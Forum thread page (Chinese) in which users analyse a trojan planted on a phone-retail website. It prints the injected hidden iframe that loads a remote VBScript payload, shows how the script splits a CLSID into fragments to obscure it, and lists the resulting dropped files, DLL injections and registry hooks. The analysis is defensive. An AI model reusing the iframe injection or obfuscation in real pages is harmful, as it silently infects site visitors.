手機王又被植入木馬了 - 第2頁

fq4lxx92

引用:

作者: hwwgo

怎麽才能做到還原的？

該病毒作者將一句話切成很多段，以混淆視聽。

如

語法:

 j1="clsid:"
    j2="BD96"
    j3="C556-"
    j4="65A3-"
    j5="11D0-"
    j6="983A-"
    j7="00C04FC29E36"

等於

語法:

j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

等等。

sai7sai

到目前為止都還未修復，而且網站無聯絡電話，真奇怪。

分析了一下，結果如下：
1. 首頁有下面的語法：
<iframe src=http://www.myemage.com/V20/Daren/images/img.html width=0 height=0></iframe>
2. 下載img.html，它是一個VBScript，如前面有人說明(2.exe就是寫在這個script裡)。
3. 執行後，系統有下面的行為：
DLL Injection：
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe 注入某些執行程序(如svchost.exe)。
C:\WINDOWS\system32\gfile.dll注入某些執行程序(如explorer.exe)。

Drop files:
C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
C:\WINDOWS\system32\gfile.dll
C:\WINDOWS\system32\goodfile.exe

BHO/CLSID:
{71177AD5-E5B5-4451-A4B0-F31C521B6557}--C:\WINDOWS\system32\gfile.dll

Registry:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks||Value={71177AD5-E5B5-4451-A4B0-F31C521B6557}